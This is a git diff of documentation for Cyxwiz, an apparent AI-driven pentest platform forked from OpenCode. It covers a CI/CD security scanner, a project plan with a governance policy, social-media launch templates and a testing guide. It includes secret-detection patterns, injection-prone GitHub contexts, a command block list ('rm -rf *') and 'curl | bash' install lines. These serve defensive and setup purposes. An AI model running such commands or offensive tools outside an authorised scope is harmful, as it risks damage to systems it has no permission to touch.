+ +```typescript +interface GateConfig { + enabled: boolean + blockOnCritical: boolean // Any critical = fail + blockOnHigh: boolean // Any high = fail + maxCritical: number // Threshold + maxHigh: number + maxMedium: number + rules: GateRule[] +} +``` + +## Security Check Details + +### Secret Detection Patterns + +| Pattern | Example | Severity | +|---------|---------|----------| +| GitHub Token | `ghp_xxxx...` | Critical | +| AWS Access Key | `AKIA...` | Critical | +| Private Key | `-----BEGIN PRIVATE KEY-----` | Critical | +| Generic API Key | `api_key: xxx` | Medium | +| High Entropy | Long random strings | Medium | + +### Dangerous GitHub Contexts (Injection) + +``` +github.event.pull_request.title +github.event.pull_request.body +github.event.issue.title +github.event.issue.body +github.event.comment.body +github.head_ref +github.event.head_commit.message +``` + +### Supply Chain Checks + +- Unpinned actions (using tags instead of SHA) +- Untrusted third-party actions +- `curl | bash` patterns +- Unpinned Docker images + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.cicd.discovery_started` | Pipeline discovery begins | +| `pentest.cicd.pipeline_discovered` | Pipeline config found | +| `pentest.cicd.scan_started` | Security scan begins | +| `pentest.cicd.secret_detected` | Hardcoded secret found | +| `pentest.cicd.injection_risk` | Injection vulnerability found | +| `pentest.cicd.sast_completed` | SAST tools finished | +| `pentest.cicd.gate_evaluated` | Security gate result | +| `pentest.cicd.scan_completed` | Scan finished | + +## Default Security Gate Rules + +```typescript +{ + blockOnCritical: true, + blockOnHigh: false, + maxCritical: 0, + maxHigh: 5, + maxMedium: 20, + rules: [ + { id: "no-secrets", category: "secrets", action: "fail" }, + { id: "no-injection", category: "injection", action: "fail" }, + { id: "pin-actions", category: "supply-chain", action: "warn" }, + ] +} +``` + +## Integration with External Tools + +### Semgrep + +Requires installation: `pip install semgrep` + +Rulesets used: +- `p/github-actions` +- `p/gitlab` +- `p/supply-chain` +- `p/secrets` + +### Gitleaks + +Requires installation: `brew install gitleaks` or download from GitHub + +Features: +- Current state scanning (default) +- Git history scanning (optional) +- Custom configuration support + +## Code Examples + +### Basic Pipeline Discovery + +```typescript +import { CICDOrchestrator } from "./pentest/cicd" + +// Discover all CI/CD pipelines in a repository +const discovery = await CICDOrchestrator.discover("/path/to/repo") + +console.log(`Found ${discovery.pipelines.length} pipelines:`) +for (const pipeline of discovery.pipelines) { + console.log(` - ${pipeline.provider}: ${pipeline.path}`) +} +``` + +### Full Security Scan + +```typescript +import { CICDOrchestrator } from "./pentest/cicd" + +// Run a comprehensive security scan +const result = await CICDOrchestrator.scan({ + target: "/path/to/repo", + profile: "standard", +}) + +console.log(`Scan completed: ${result.status}`) +console.log(`Findings: ${result.findings.length}`) +console.log(` Critical: ${result.stats.bySeverity.critical}`) +console.log(` High: ${result.stats.bySeverity.high}`) + +// Check gate result +if (result.gateResult) { + console.log(`Gate: ${result.gateResult.status}`) + if (!result.gateResult.passed) { + console.log(`Blocked by: ${result.gateResult.failedRules.join(", ")}`) + } +} +``` + +### Secret Detection Only + +```typescript +import { SecretsCheck } from "./pentest/cicd/checks/secrets" +import { promises as fs } from "fs" + +const content = await fs.readFile(".github/workflows/ci.yml", "utf-8") +const result = SecretsCheck.detect(content, ".github/workflows/ci.yml") + +for (const finding of result.findings) { + console.log(`[${finding.severity}] ${finding.patternName}`) + console.log(` File: ${finding.file}:${finding.line}`) + console.log(` Value: ${finding.redacted}`) +} +``` + +### Check for Injection Vulnerabilities + +```typescript +import { InjectionCheck } from "./pentest/cicd/checks/injection" +import { GitHubProvider } from "./pentest/cicd/providers/github" + +const content = ` +name: PR Check +on: pull_request + +jobs: + check: + runs-on: ubuntu-latest + steps: + - run: echo "PR Title: \${{ github.event.pull_request.title }}" +` + +const parseResult = GitHubProvider.parse(content, ".github/workflows/pr.yml") +if (parseResult.success && parseResult.pipeline) { + const injection = InjectionCheck.detect(parseResult.pipeline) + + for (const finding of injection.findings) { + console.log(`[${finding.severity}] ${finding.title}`) + console.log(` ${finding.description}`) + console.log(` Remediation: ${finding.remediation}`) + } +} +``` + +### Supply Chain Analysis + +```typescript +import { SupplyChainCheck } from "./pentest/cicd/checks/supply-chain" + +const result = SupplyChainCheck.check(pipeline, { + requirePinning: true, + trustedPrefixes: ["actions/", "github/", "my-org/"], +}) + +console.log(`Actions analyzed: ${result.actionsAnalyzed}`) +console.log(`Unpinned: ${result.unpinnedActions}`) +console.log(`Untrusted: ${result.untrustedActions}`) + +for (const finding of result.findings) { + if (finding.severity === "high") { + console.log(`⚠️ ${finding.title}`) + console.log(` ${finding.remediation}`) + } +} +``` + +### SAST Integration + +```typescript +import { SASTOrchestrator } from "./pentest/cicd/sast" + +// Check tool availability +const available = await SASTOrchestrator.checkAvailability() +console.log("Available tools:", Object.entries(available) + .filter(([_, v]) => v).map(([k]) => k)) + +// Run SAST scan +const result = await SASTOrchestrator.run({ + tools: ["semgrep", "gitleaks"], + target: "/path/to/repo", + gitleaks: { + history: true, + depth: 50, + }, +}) + +console.log(`SAST completed in ${result.stats.duration}ms`) +console.log(`Total findings: ${result.stats.totalFindings}`) +``` + +### Custom Security Gate + +```typescript +import { SecurityGates } from "./pentest/cicd/gates" + +const gateConfig = { + enabled: true, + blockOnCritical: true, + blockOnHigh: true, + maxCritical: 0, + maxHigh: 0, + maxMedium: 10, + rules: [ + { id: "no-secrets", category: "secrets", action: "fail" }, + { id: "no-injection", category: "injection", action: "fail" }, + { id: "pin-actions", category: "supply-chain", action: "fail" }, + { id: "check-permissions", category: "permissions", action: "warn" }, + ], +} + +const gateResult = SecurityGates.evaluate(scanResult.findings, gateConfig) + +if (gateResult.passed) { + console.log("✅ Security gate PASSED") +} else { + console.log("❌ Security gate FAILED") + console.log(` Failed rules: ${gateResult.failedRules.length}`) + console.log(` Warnings: ${gateResult.warnedRules.length}`) +} +``` + +### Event Subscription + +```typescript +import { Bus } from "./bus" +import { CICDEvents } from "./pentest/cicd/events" + +// Subscribe to findings in real-time +Bus.subscribe(CICDEvents.SecretDetected, (event) => { + console.log(`🔐 Secret found: ${event.patternName}`) + console.log(` File: ${event.file}:${event.line}`) +}) + +Bus.subscribe(CICDEvents.InjectionRisk, (event) => { + console.log(`💉 Injection risk: ${event.type}`) + console.log(` Source: ${event.source}`) +}) + +Bus.subscribe(CICDEvents.GateEvaluated, (event) => { + const icon = event.passed ? "✅" : "❌" + console.log(`${icon} Gate ${event.status}: ${event.message}`) +}) +``` + +### Parsing Different Providers + +```typescript +import { GitHubProvider, GitLabProvider, JenkinsProvider } from "./pentest/cicd/providers" + +// GitHub Actions +const ghResult = GitHubProvider.parse(workflowYaml, ".github/workflows/ci.yml") + +// GitLab CI +const glResult = GitLabProvider.parse(gitlabCiYaml, ".gitlab-ci.yml") + +// Jenkins +const jkResult = JenkinsProvider.parse(jenkinsfile, "Jenkinsfile") + +// All providers implement the same interface +for (const result of [ghResult, glResult, jkResult]) { + if (result.success && result.pipeline) { + console.log(`Provider: ${result.pipeline.provider}`) + console.log(`Jobs: ${result.pipeline.jobs.length}`) + console.log(`Secrets referenced: ${result.pipeline.secrets.length}`) + } +} +``` + +## Future Enhancements + +- Azure DevOps pipeline support +- CircleCI pipeline support +- Tekton pipeline support +- ArgoCD security analysis +- GitHub Advanced Security integration +- Custom Semgrep rule authoring +- SARIF export format +- Integration with security dashboards + +## References + +- [GitHub Actions Security Hardening](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) +- [GitLab CI/CD Security](https://docs.gitlab.com/ee/ci/pipelines/pipeline_security.html) +- [Jenkins Security](https://www.jenkins.io/doc/book/security/) +- [GitHub Security Lab - Script Injection](https://securitylab.github.com/research/github-actions-untrusted-input/) +- [OWASP CI/CD Security](https://owasp.org/www-project-devsecops-guideline/) diff --git a/docs/PROJECT.md b/docs/PROJECT.md new file mode 100644 index 00000000000..b8a4dd13043 --- /dev/null +++ b/docs/PROJECT.md @@ -0,0 +1,584 @@ +# Cyxwiz - AI Operations Platform + +> A multi-domain AI operations platform for professionals who use command-line tools. Speak intent, tools execute with governance, AI explains results - all auditable. + +--- + +## Vision + +Cyxwiz is not a tool. **Cyxwiz is a platform.** + +Starting with security (pentest), expanding to SOC, DevOps, Network Engineering, and beyond. One platform, many domains, governed AI orchestration for all. + +--- + +## Strategic Foundation + +### Fork, Don't Build From Scratch + +Cyxwiz is built by forking [OpenCode](https://github.com/anomalyco/opencode) (MIT licensed). + +**What OpenCode gives us:** +- CLI/TUI framework (Bubble Tea) +- Multi-LLM support (Claude, GPT, Gemini, etc.) +- Session management +- Tool execution framework +- Plugin system +- SDK for integrations +- 70k+ stars of validation + +**What we add:** +- Governance engine (core, not plugin) +- Scope enforcement (core) +- Audit logging (core) +- Domain-specific agents +- Domain-specific tools with parsers +- Findings/state management +- Report generation +- Our own plugin ecosystem + +### Why Fork vs Plugin + +| As Plugin | As Fork (Platform) | +|-----------|-------------------| +| Limited by OpenCode's roadmap | Full control | +| Can't modify core UX | Customize everything | +| "Cyxwiz for OpenCode" | "Cyxwiz" | +| Tenant | Owner | +| Single product ceiling | Platform potential | + +--- + +## Platform Architecture + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ CYXWIZ PLATFORM │ +│ (Forked from OpenCode, MIT) │ +├─────────────────────────────────────────────────────────────────┤ +│ │ +│ CORE FRAMEWORK (inherited from OpenCode): │ +│ ┌────────────────────────────────────────────────────────────┐ │ +│ │ CLI/TUI │ Multi-LLM │ Sessions │ Tool Exec │ Plugin System │ │ +│ └────────────────────────────────────────────────────────────┘ │ +│ │ +│ CYXWIZ CORE (our additions - NOT plugins): │ +│ ┌────────────────────────────────────────────────────────────┐ │ +│ │ │ │ +│ │ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ │ +│ │ │ Governance │ │ Scope │ │ Audit │ │ │ +│ │ │ Engine │ │ Enforcement │ │ Logging │ │ │ +│ │ └──────────────┘ └──────────────┘ └──────────────┘ │ │ +│ │ │ │ +│ │ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ │ +│ │ │ Findings │ │ Report │ │ Domain │ │ │ +│ │ │ Store │ │ Generation │ │ Registry │ │ │ +│ │ └──────────────┘ └──────────────┘ └──────────────┘ │ │ +│ │ │ │ +│ └────────────────────────────────────────────────────────────┘ │ +│ │ +│ DOMAIN AGENTS (pluggable, extensible): │ +│ ┌────────────────────────────────────────────────────────────┐ │ +│ │ │ │ +│ │ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ │ │ +│ │ │ Pentest │ │ SOC │ │ DevOps │ │ NetEng │ ... │ │ +│ │ │ Agent │ │ Agent │ │ Agent │ │ Agent │ │ │ +│ │ └─────────┘ └─────────┘ └─────────┘ └─────────┘ │ │ +│ │ │ │ │ │ │ │ +│ │ ▼ ▼ ▼ ▼ │ │ +│ │ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ │ │ +│ │ │ Tools │ │ Tools │ │ Tools │ │ Tools │ │ │ +│ │ │ nmap, │ │ splunk, │ │ kubectl │ │ cisco, │ │ │ +│ │ │ nikto │ │ elastic │ │ ansible │ │ juniper │ │ │ +│ │ └─────────┘ └─────────┘ └─────────┘ └─────────┘ │ │ +│ │ │ │ +│ └────────────────────────────────────────────────────────────┘ │ +│ │ +│ COMMUNITY PLUGINS (our ecosystem): │ +│ ┌────────────────────────────────────────────────────────────┐ │ +│ │ Third-party agents │ Custom tools │ Integrations │ ... │ │ +│ └────────────────────────────────────────────────────────────┘ │ +│ │ +└─────────────────────────────────────────────────────────────────┘ +``` + +--- + +## Tech Stack + +### Language: TypeScript + +OpenCode is TypeScript. We stay TypeScript. + +| Component | Technology | Source | +|-----------|------------|--------| +| Language | TypeScript | Inherited | +| Runtime | Bun | Inherited | +| CLI Framework | Cobra-style | Inherited | +| TUI | Bubble Tea (via JS bindings) | Inherited | +| Multi-LLM | OpenCode providers | Inherited | +| State | SQLite | Inherited + Extended | +| Plugin System | OpenCode plugins | Inherited + Extended | +| Tool Execution | Subprocess | Inherited | + +### What We Modify/Add + +| Component | Change | +|-----------|--------| +| Governance Engine | New - core feature | +| Scope Enforcement | New - core feature | +| Audit System | New - core feature | +| Findings Store | New - extended SQLite schema | +| Domain Registry | New - agent/tool management | +| Report Generator | New - export system | + +--- + +## Governance Engine (Core Feature) + +This is what differentiates Cyxwiz from vanilla OpenCode. + +### How It Works + +``` +┌─────────────────────────────────────────────────────────┐ +│ COMMAND LIFECYCLE │ +│ │ +│ User Intent │ +│ ↓ │ +│ LLM Translation → "nmap -sV 10.0.0.15" │ +│ ↓ │ +│ ┌─────────────────────────────────────┐ │ +│ │ GOVERNANCE CHECK │ │ +│ │ │ │ +│ │ 1. Scope Check │ │ +│ │ Is 10.0.0.15 in allowed scope? │ │ +│ │ │ │ +│ │ 2. Policy Check │ │ +│ │ Is nmap auto-approved? │ │ +│ │ Any dangerous flags? │ │ +│ │ │ │ +│ │ 3. Approval Flow │ │ +│ │ Auto-approve OR prompt user │ │ +│ │ │ │ +│ └─────────────────────────────────────┘ │ +│ ↓ │ +│ Execute (if approved) │ +│ ↓ │ +│ Audit Log (always) │ +│ ↓ │ +│ Parse Output → Findings Store │ +│ ↓ │ +│ LLM Explanation │ +└─────────────────────────────────────────────────────────┘ +``` + +### Policy Configuration (Per Domain) + +```typescript +// Example: Pentest domain policy +{ + domain: "pentest", + autoApprove: [ + "nmap *", + "nikto *", + "ffuf *", + "nuclei *", + "whois *", + "dig *", + "curl *" + ], + requireApproval: [ + "metasploit *", + "sqlmap --os-*", + "* --exploit *", + "* --exec *" + ], + blocked: [ + "rm -rf *", + "* > /dev/*" + ] +} +``` + +--- + +## Domain Agents + +### MVP: Pentest Agent + +**Target User:** Solo security consultant + +**Tools:** +| Tool | Purpose | Parser | +|------|---------|--------| +| nmap | Port scanning | XML parser | +| nikto | Web vuln scanning | Text parser | +| ffuf | Fuzzing | JSON parser | +| nuclei | Template scanning | JSON parser | +| whois | Domain recon | Text parser | +| dig | DNS queries | Text parser | +| metasploit | Exploitation | RPC parser | + +**Workflow:** +``` +cyxwiz pentest start --scope 10.0.0.0/24 --exclude 10.0.0.1 + +> "scan for open ports" +[nmap executes, findings stored] + +> "check web services for vulnerabilities" +[nikto + nuclei on discovered web ports] + +> "generate report" +[markdown/PDF export] +``` + +### Future: SOC Agent + +**Target User:** Security analyst + +**Tools:** +- Splunk queries +- Elastic search +- SIEM integrations +- Threat intel lookups +- IOC checking + +### Future: DevOps Agent + +**Target User:** DevOps engineer + +**Tools:** +- kubectl +- terraform +- ansible +- docker +- cloud CLIs (aws, gcloud, az) + +### Future: NetEng Agent + +**Target User:** Network engineer + +**Tools:** +- cisco IOS commands +- juniper CLI +- network scanners +- config parsers + +--- + +## Build Phases + +### Phase 1: Fork & Foundation +- [ ] Fork OpenCode repository +- [ ] Set up development environment +- [ ] Understand codebase structure +- [ ] Identify modification points for governance +- [ ] Create Cyxwiz branding/naming + +**Deliverable:** Building Cyxwiz from source, understanding the codebase. + +### Phase 2: Governance Engine +- [ ] Implement `tool.execute.before` hook for governance +- [ ] Build scope definition system +- [ ] Build policy configuration system +- [ ] Implement approval flow (auto/prompt/block) +- [ ] Implement audit logging + +**Deliverable:** Any command goes through governance check before execution. + +### Phase 3: Pentest Agent MVP +- [ ] Create pentest agent configuration +- [ ] Implement nmap tool with XML parser +- [ ] Implement scope enforcement for targets +- [ ] Basic findings storage +- [ ] LLM explanation of results + +**Deliverable:** Can run "scan ports on X" with governance and get explained results. + +### Phase 4: Multi-Tool Pentest +- [ ] Add nikto, ffuf, nuclei tools +- [ ] Add parsers for each +- [ ] Findings accumulation +- [ ] Cross-tool context (LLM knows all findings) + +**Deliverable:** Full recon workflow with multiple tools. + +### Phase 5: State & Reports +- [ ] Session persistence (resume engagements) +- [ ] Findings export (markdown, JSON) +- [ ] Report generation +- [ ] Engagement history + +**Deliverable:** Professional pentest workflow with deliverables. + +### Phase 6: Platform Polish +- [ ] Domain registry system +- [ ] Plugin system for community agents +- [ ] Documentation +- [ ] Distribution (npm, binary, docker) + +**Deliverable:** Cyxwiz v1.0 - platform ready for public use. + +### Phase 7+: Multi-Domain Expansion +- [ ] SOC agent +- [ ] DevOps agent +- [ ] NetEng agent +- [ ] Community contributions + +--- + +## UI Evolution + +Inherited from OpenCode, enhanced for Cyxwiz: + +### CLI (Default) +``` +$ cyxwiz pentest start --scope 10.0.0.0/24 +Starting engagement: external-pentest +Scope: 10.0.0.0/24 +Audit log: ~/.cyxwiz/audits/2024-01-15-001.log + +> scan for open ports on the entire scope +[Governance: APPROVED - nmap is auto-approved] +[Executing: nmap -sV -sC -oX /tmp/scan.xml 10.0.0.0/24] + +Found 12 hosts with open ports... +``` + +### TUI (Inherited from OpenCode) +``` +┌─────────────────────────────────────────────────────────┐ +│ Cyxwiz Pentest │ Scope: 10.0.0.0/24 │ Findings: 23 │ +├─────────────┬───────────────────┬───────────────────────┤ +│ TARGETS │ FINDINGS │ AUDIT LOG │ +│ │ │ │ +│ ● 10.0.0.15 │ ⚠ SSH outdated │ [14:23] nmap started │ +│ ● 10.0.0.20 │ ⚠ HTTP exposed │ [14:25] 12 hosts up │ +│ ○ 10.0.0.25 │ ✗ Default creds │ [14:30] nikto done │ +├─────────────┴───────────────────┴───────────────────────┤ +│ > check .15 for web vulnerabilities │ +└─────────────────────────────────────────────────────────┘ +``` + +### Web UI (Future) +- FastAPI backend +- HTMX → Svelte frontend +- Same core, different interface + +--- + +## What Success Looks Like + +### Phase 3 (MVP): +``` +$ cyxwiz pentest start --scope scanme.nmap.org + +> scan for open ports +[APPROVED] Executing nmap... + +Found 4 open ports on scanme.nmap.org: +- 22/tcp: OpenSSH 6.6.1 (protocol 2.0) +- 80/tcp: Apache httpd 2.4.7 +- 9929/tcp: Nping echo +- 31337/tcp: Elite backdoor (likely test) + +Recommendation: Investigate port 80 for web vulnerabilities. + +> ok do that +[APPROVED] Executing nikto... +``` + +### Phase 6 (v1.0): +``` +$ cyxwiz + +Available domains: + pentest - Security testing and assessment + soc - Security operations and monitoring (coming soon) + devops - Infrastructure and deployment (coming soon) + +$ cyxwiz pentest +$ cyxwiz soc +$ cyxwiz devops +``` + +--- + +## Market Evolution + +### Phase 1-5: Niche Tool +- Target: Solo security consultants +- Revenue: $5K-$20K/month +- Model: Open source + paid features + +### Phase 6+: Platform Play +- Target: Security teams, DevOps teams, IT departments +- Revenue: Platform potential +- Model: Open source core + enterprise features + marketplace + +### Long-term Moat +1. **Governance engine** - Differentiator from generic AI tools +2. **Domain expertise** - Deep integration with professional tools +3. **Audit compliance** - Enterprise requirement +4. **Community ecosystem** - Network effects from plugins + +--- + +## Distribution Strategy + +### The Kali/Parrot Advantage + +Security-focused Linux distributions like Kali and Parrot OS come with 600+ pre-installed security tools. Cyxwiz becomes the intelligent orchestration layer on top. + +``` +┌─────────────────────────────────────────────────────────┐ +│ KALI/PARROT + CYXWIZ │ +│ │ +│ Pre-installed (600+ tools): │ +│ ├─ nmap, nikto, metasploit, sqlmap, ffuf, nuclei │ +│ ├─ burpsuite, wireshark, john, hashcat, hydra │ +│ ├─ gobuster, dirb, wfuzz, amass, subfinder │ +│ └─ ... hundreds more │ +│ │ +│ What's missing: │ +│ └─ Intelligent orchestration ← CYXWIZ fills this gap │ +│ │ +│ Result: │ +│ └─ Junior analyst can use pro tools safely │ +│ └─ Senior analyst works 10x faster │ +│ └─ Everything audited and governed │ +└─────────────────────────────────────────────────────────┘ +``` + +### Integration Levels + +**Level 1: Manual Install (Day 1)** +```bash +# Works on any Kali/Parrot box +curl -fsSL https://cyxwiz.dev/install | bash +cyxwiz setup # Auto-detects available tools +``` + +**Level 2: Package Repository (Phase 6)** +```bash +# Submit to Kali repos +sudo apt update +sudo apt install cyxwiz +``` + +**Level 3: Pre-installed (Long-term Goal)** +- Partner with Offensive Security (Kali maintainers) +- Get Cyxwiz included in default installation +- Every Kali download = potential Cyxwiz user + +### Auto-Detection System + +Cyxwiz adapts to available tools: + +```typescript +// On first run or `cyxwiz setup` +const detectTools = async () => { + const detected = []; + + for (const tool of SUPPORTED_TOOLS) { + if (await commandExists(tool.binary)) { + detected.push({ + name: tool.name, + version: await getVersion(tool.binary), + parser: tool.parser, + status: 'available' + }); + } + } + + // Cyxwiz works with whatever is installed + // Full power on Kali, limited on vanilla Ubuntu + return detected; +}; +``` + +**Output example:** +``` +$ cyxwiz setup + +Detecting available tools... + +RECONNAISSANCE + ✓ nmap 7.94 Port scanning + ✓ amass 3.19 Subdomain enumeration + ✓ subfinder 2.5 Subdomain discovery + ✗ masscan Fast port scanning (not installed) + +WEB ANALYSIS + ✓ nikto 2.5 Web vulnerability scanner + ✓ ffuf 2.0 Web fuzzer + ✓ nuclei 2.9 Template-based scanner + ✓ sqlmap 1.7 SQL injection + +EXPLOITATION + ✓ metasploit 6.3 Exploitation framework + ✓ hydra 9.4 Password cracking + +47 tools available. Cyxwiz is ready. +``` + +### Distribution Channels + +| Platform | Method | Friction | Timeline | +|----------|--------|----------|----------| +| Any Linux | curl script | Low | Phase 3 | +| Kali/Parrot | apt package | Very low | Phase 6 | +| Kali/Parrot | Pre-installed | Zero | Phase 7+ | +| Docker | `docker run cyxwiz` | Low | Phase 5 | +| macOS | `brew install cyxwiz` | Low | Phase 6 | +| Windows/WSL | curl script | Medium | Phase 6 | + +### Why Kali/Parrot Teams Would Accept Cyxwiz + +| Their Priority | How Cyxwiz Helps | +|----------------|---------------| +| Beginner accessibility | Natural language interface | +| Tool discoverability | Cyxwiz suggests relevant tools | +| Professional use | Governance + audit trails | +| Community value | Open source (MIT) | +| Distro differentiation | No competitor has this | + +### The Pitch (When Ready) + +> "Cyxwiz is the missing brain for Kali Linux. Your 600+ tools, now accessible through natural language. Junior analysts work safely with built-in governance. Senior analysts work faster with intelligent orchestration. Every action audited for compliance. The AI layer your toolkit has been waiting for." + +--- + +## Risks & Mitigations + +| Risk | Mitigation | +|------|------------| +| OpenCode changes license | Already forked, MIT is irrevocable | +| OpenCode dies | We own our fork, continue independently | +| Can't keep up with OpenCode updates | Cherry-pick relevant updates only | +| TypeScript learning curve | OpenCode codebase is well-structured | +| Governance adds latency | Optimize hot paths, cache policy decisions | +| Multi-domain dilutes focus | Nail pentest first before expanding | + +--- + +## Open Questions + +- [ ] Cyxwiz branding (name, logo, domain) +- [ ] Open source model (MIT? Apache? AGPL for enterprise?) +- [ ] Community building strategy +- [ ] When to diverge significantly from OpenCode upstream +- [ ] Enterprise features for monetization + +--- + +## Next Step + +1. Fork OpenCode +2. Build locally +3. Explore codebase +4. Identify where to inject governance engine + +Start with understanding. Then modify. diff --git a/docs/SOCIAL_POST_TEMPLATE.md b/docs/SOCIAL_POST_TEMPLATE.md new file mode 100644 index 00000000000..24b65a55cd8 --- /dev/null +++ b/docs/SOCIAL_POST_TEMPLATE.md @@ -0,0 +1,235 @@ +# Cyxwiz - Social Media Post Templates + +## Short Version (Twitter/X, LinkedIn) + +``` +Tired of memorizing nmap flags, nikto options, and nuclei syntax? + +I built Cyxwiz - an AI-powered pentest assistant. Just describe what you need: + +"scan this network for web vulnerabilities" + +And it: +- Runs the right tools (nmap, nikto, nuclei) +- Parses the output +- Classifies findings by severity +- Generates professional reports + +Built on OpenCode agent. Open source. + +GitHub: https://github.com/code3hr/opencode +Download: https://github.com/code3hr/opencode/releases/latest + +#infosec #pentesting #cybersecurity #AI #opensource +``` + +--- + +## Medium Version (Reddit, Dev.to, Forums) + +``` +# Cyxwiz: Stop Memorizing Tool Syntax, Start Describing What You Need + +Hey everyone, + +I've been working on something I think the community might find useful. + +## The Problem + +As pentesters, we spend too much time on syntax: +- nmap has 130+ options +- nuclei has dozens of flags +- sqlmap has 100+ parameters + +Multiply by 30+ tools per assessment. That's not security work - that's a memorization exercise. + +## The Solution: Cyxwiz + +Cyxwiz is an AI-powered security assistant. You describe what you want in plain English: + +``` +You: "scan 192.168.1.0/24 for web vulnerabilities" + +Cyxwiz: [Runs nmap → finds web servers] + [Runs nikto → checks vulnerabilities] + [Runs nuclei → matches CVEs] + + Found 3 critical, 5 high, 8 medium findings. + All saved with evidence. Want a report? +``` + +## What Makes It Different? + +Built on OpenCode (superior agent architecture), Cyxwiz adds: + +- **30+ Security Tools** - nmap, nikto, nuclei, gobuster, sqlmap, etc. +- **Intelligent Parsers** - Extracts structured findings from raw output +- **Findings Database** - Severity classification, OWASP mapping, CVE tracking +- **Governance Engine** - Scope enforcement, audit trails +- **Report Generation** - Professional HTML/PDF reports + +## Not Another Wrapper + +Unlike basic LLM CLIs that just run commands, Cyxwiz: +- Actually understands security tool output +- Maintains persistent findings across sessions +- Prevents out-of-scope accidents +- Generates compliance-ready audit logs + +## Try It + +- GitHub: https://github.com/code3hr/opencode +- Download: https://github.com/code3hr/opencode/releases/latest +- Platforms: Linux, macOS, Windows + +It's open source (MIT). Would love feedback from the community. + +What features would you want to see? +``` + +--- + +## Long Version (Hacker News "Show HN", Blog Post) + +``` +# Show HN: Cyxwiz - AI-Powered Pentest Assistant (Open Source) + +I built Cyxwiz because I was tired of context-switching between remembering tool syntax and actually doing security work. + +## Background + +I've been doing security assessments for a while, and the workflow is always: +1. Remember the right tool for the job +2. Look up the flags (again) +3. Run the command +4. Parse the output manually +5. Copy findings to a spreadsheet +6. Repeat 100 times +7. Manually write the report + +## What Cyxwiz Does + +Cyxwiz lets you describe what you want in natural language: + +"check if this Apache server is vulnerable to path traversal" + +And it: +1. Selects the right tools (nuclei with CVE-2021-41773 templates) +2. Runs them with correct parameters +3. Parses the output into structured findings +4. Classifies by severity (Critical/High/Medium/Low) +5. Stores with evidence for the report +6. Generates professional reports when you're done + +## Technical Details + +Built on OpenCode (https://github.com/sst/opencode), which provides: +- Superior agent architecture vs generic LLM CLIs +- Extensible tool framework with typed I/O +- Multi-LLM support (Claude, GPT-4, Gemini, local models) + +Cyxwiz adds a security layer: +- 30+ tool integrations with output parsers +- Findings database with OWASP/CVE categorization +- Governance engine (scope enforcement, audit trails) +- Report generation (HTML, PDF, Markdown) + +## What It's NOT + +- Not a replacement for knowing what you're doing +- Not for unauthorized testing +- Not a magic "hack anything" button + +It's an assistant that handles the tedious parts so you can focus on analysis. + +## Stack + +- TypeScript/Bun +- Runs on Kali, Parrot, any Linux, macOS, Windows +- Requires API key (Claude recommended, GPT-4 works too) + +## Links + +- GitHub: https://github.com/code3hr/opencode +- Downloads: https://github.com/code3hr/opencode/releases/latest + +Open source, MIT licensed. Feedback welcome! +``` + +--- + +## Quick Demo Script (for Video/GIF) + +``` +# Terminal recording script + +$ ./cyxwiz + +> scan 10.0.0.5 for vulnerabilities + +[Cyxwiz runs nmap, detects Apache 2.4.41] +[Cyxwiz runs nikto, finds misconfigurations] +[Cyxwiz runs nuclei, matches CVE-2021-41773] + +Found 1 critical, 2 high, 3 medium findings. + +> show critical findings + +CRITICAL: CVE-2021-41773 - Apache Path Traversal +- Target: 10.0.0.5:80 +- Impact: Remote Code Execution +- Evidence: [response data] +- Remediation: Upgrade to Apache 2.4.51+ + +> generate report + +Report generated: assessment-2024-01-15.html +``` + +--- + +## Platform-Specific Tips + +### Reddit (r/netsec, r/pentesting) +- Don't be too salesy +- Focus on the problem you solved +- Ask for feedback +- Engage with comments + +### Hacker News +- Technical depth appreciated +- Mention the architecture +- Be honest about limitations +- "Show HN:" prefix for launches + +### Twitter/X +- Thread format works well +- Include a GIF/video demo +- Tag relevant accounts +- Use hashtags sparingly + +### LinkedIn +- More professional tone +- Mention business value +- Connect with security leaders + +### Product Hunt +- Need good visuals +- Schedule for Tuesday-Thursday +- Prepare for Q&A + +--- + +## Hashtags + +``` +#infosec #pentesting #cybersecurity #hacking #security +#bugbounty #redteam #AI #LLM #opensource #kalilinux +``` + +## Accounts to Tag (Twitter) + +``` +@offensive_con @defaboreal @NahamSec @staboreal +@TomNomNom @Jhaddix @inlocsec @InfoSecSherpa +``` diff --git a/docs/TEST.md b/docs/TEST.md new file mode 100644 index 00000000000..2dd0ac10484 --- /dev/null +++ b/docs/TEST.md @@ -0,0 +1,430 @@ +# Testing Documentation + +This document describes the testing approach, test structure, and how to run tests for cyxwiz. + +--- + +## Table of Contents + +- [Overview](#overview) +- [Running Tests](#running-tests) +- [Test Structure](#test-structure) +- [Governance Tests](#governance-tests) +- [Writing Tests](#writing-tests) +- [Coverage](#coverage) + +--- + +## Overview + +cyxwiz uses [Bun's built-in test runner](https://bun.sh/docs/cli/test) for unit and integration testing. Tests are located in the `packages/opencode/test/` directory and mirror the source structure. + +### Test Stack + +| Tool | Purpose | +|------|---------| +| Bun Test | Test runner and assertions | +| `bun:test` | Test framework imports (test, expect, describe) | +| Coverage | Built-in coverage reporting | + +--- + +## Running Tests + +### Prerequisites + +Ensure Bun is installed: + +```bash +# Install Bun +curl -fsSL https://bun.sh/install | bash + +# Verify installation +bun --version +``` + +### Run All Tests + +```bash +cd packages/opencode +bun test +``` + +### Run Specific Test File + +```bash +cd packages/opencode +bun test test/governance/governance.test.ts +``` + +### Run Tests Matching Pattern + +```bash +cd packages/opencode +bun test --test-name-pattern "classifyTarget" +``` + +### Run Tests with Coverage + +```bash +cd packages/opencode +bun test --coverage +``` + +### Watch Mode + +```bash +cd packages/opencode +bun test --watch +``` + +--- + +## Test Structure + +``` +packages/opencode/test/ +├── agent/ # Agent-related tests +├── cli/ # CLI command tests +├── config/ # Configuration tests +├── file/ # File operation tests +├── governance/ # Governance engine tests +│ ├── governance.test.ts # Main test suite +│ └── test-standalone.ts # Standalone test script +├── lsp/ # LSP integration tests +├── mcp/ # MCP protocol tests +├── permission/ # Permission system tests +├── plugin/ # Plugin system tests +├── provider/ # Provider tests +├── session/ # Session management tests +├── tool/ # Tool tests +├── util/ # Utility function tests +├── bun.test.ts # Bun test configuration +└── preload.ts # Test preload script +``` + +--- + 